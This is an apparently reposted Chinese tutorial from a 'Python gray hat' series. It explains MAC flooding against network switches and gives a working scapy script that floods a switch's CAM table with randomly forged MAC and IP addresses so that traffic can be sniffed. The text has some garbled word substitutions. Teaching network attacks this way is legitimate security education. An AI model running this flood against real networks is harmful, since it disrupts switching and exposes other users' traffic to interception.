《Python灰帽编程 3.3 MAC洪水攻击》要点:
本文介绍了Python灰帽编程 3.3 MAC洪水攻击,希望对您有用。如果有疑问,可以联系我们。
实在是搞不定 这里编辑器的 代码排版,逼迫症请 到微信订阅号(xuanhun521)查看.
Python灰帽编程 3.3 MAC洪水
传统的交换机(我只对我目前使用的交互机做过测试,依照常识只能这样表述)在数据转发过程中依靠对CAM表的查询来确定正确的转发接口,一旦在查询过程中无法找到相关目的MAC对应的条目,此数据帧将作为广播帧来处理.CAM表的容量有限,只能储存不多的条目,当CAM表记录的MAC地址达到上限后,新的条目将不会添加到CAM表中.
基于以上原理,我们会发现一个非常有趣的现象.某台PC赓续发送去往未知目的地的数据帧,且每个包的源MAC地址都不同,当这样 的数据包发送的速度足够快之后,快到在刷新时间内将交换机的CAM表迅速填满.CAM表被这些伪造的MAC地址占据,真实的MA C地址条目却无法进入CAM表.那么任何一个经过交换机的正常单播数据帧都会以广播帧的形式来处理.交换机在此种情况下被降级为Hub.
交换机降级为hub之后,我们就可以监听所有连接到该交换机的主机的数据了.
当然,具体交互设备对ARP洪水的响应是不一样的,必要实地测试.下面我们进入编程环节.
3.3.1 编码实战
构造随机的MAC和IP地址办法有很多,因为地址的标准格式在那里,很容易拼装.这里要给大家介绍的是scapy模块中的RandMAC和RandIP办法.这两个办法用来随机产生MAC地址和IP地址,办法接收模板参数,来产生特定网段的地址.
例如下面的代码:
#!/usr/bin/python
from scapy.all import *
i=5
while(i):
print RandMAC()
print RandIP()
i=i-1
运行结果如下图:
图2
如果必要产生固定网段的IP,可以输入指定的模板.
#!/usr/bin/python
from scapy.all import *
i=5
while(i):
print RandIP("192.168.1.*")
i=i-1
运行结果如下:
图3
随机的问题办理之后,下面我们考虑下什么样的数据包能达到目的呢?回看一下前文提到的内容,只要我们的数据包中有指定的源IP和MAC,那么交换机就会进行记录.
例如ARP包:
Ether(src=RandMAC(),dst="FF:FF:FF:FF:FF:FF")/ARP(op=2, psrc="0.0.0.0", hwdst="FF:FF:FF:FF:FF:FF")/Padding(load="X"*18))
例如ICMP包:
Ether(src=RandMAC("*:*:*:*:*:*"),
dst=RandMAC("*:*:*:*:*:*")) / \
IP(src=RandIP("*.*.*.*"),
dst=RandIP("*.*.*.*")) / \
ICMP()
两个核心问题办理了,可以写完整的代码了:
图4
#!/usr/bin/python
import sys
from scapy.all import *
import time
iface="eth0"
if len(sys.argv)>=2:
iface=sys.argv[1]
while(1):
packet= Ether(src=RandMAC("*:*:*:*:*:*"),
dst=RandMAC("*:*:*:*:*:*")) / \
IP(src=RandIP("*.*.*.*"),
dst=RandIP("*.*.*.*")) / \
ICMP()
time.sleep(0.5)
sendp(packet,iface=iface,loop=0)
上面的代码通过不停的发送ICMP数据包,来实现MAC洪水攻击.运行结果如下:
图5
3.3.2 小结
本节的内容在编程上没有什么新的知识值得探讨,主要希望大家对交换网络和以太网的理解通过编程的方式进一步加深.
下一节,我们一起探讨下针对VLAN的攻击.
查看完整系列教程,请关注我的微信订阅号(xuanhun521,下方二维码),回复“python”.问题讨论请加qq群:Hacking (1群):303242737 Hacking (2群):147098303.
明天开始的每周一书活动,已经开始.首先说明,本周活动有效时间为2016年8月28日到2016年9月4日.本周为大家送出的书是由机械工业出版社出版,马伟编著的《编写高质量代码:改善C程序代码的125个建议》.
参与活动的方式为进入微信订阅号(xuanhun521),回复“每周一书”,在这本书相关的文章下面留言参与.
玄魂工作室-精彩赓续
欢迎交流《Python灰帽编程 3.3 MAC洪水攻击》相关教程,维易PHP学堂将分享更多教程。
转载请注明本页网址:
http://www.vephp.com/jiaocheng/9117.html